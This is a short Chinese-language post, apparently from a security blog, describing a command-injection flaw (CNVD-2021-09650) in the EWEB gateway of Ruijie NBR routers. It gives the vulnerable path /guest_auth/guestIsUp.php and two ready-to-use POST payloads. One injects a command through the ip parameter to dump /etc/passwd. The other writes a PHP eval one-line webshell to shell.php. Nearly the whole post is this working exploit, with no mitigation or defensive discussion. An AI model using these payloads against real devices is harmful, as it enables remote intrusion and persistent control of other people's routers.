锐捷NBR路由器 远程命令执行漏洞 CNVD-2021-09650

2022-01-04 09:22:51 浏览数 (1)

锐捷NBR路由器 EWEB网关系统部分接口存在命令注入,导致远程命令执行获取

URL后面加 /guest_auth/guestIsUp.php,此路径为漏洞存在地。

我们打开hacker Bar,在Post data 输入 mac=1&ip=192.168.1.1|cat /etc/passwd > test.txt

利用此漏洞我们可以将一句话木马写入shell

Payload :

mac=1&ip=192.168.1.1|echo ‘<?php @eval($_POST[‘bb’]) ?>’ > shell.php

0 人点赞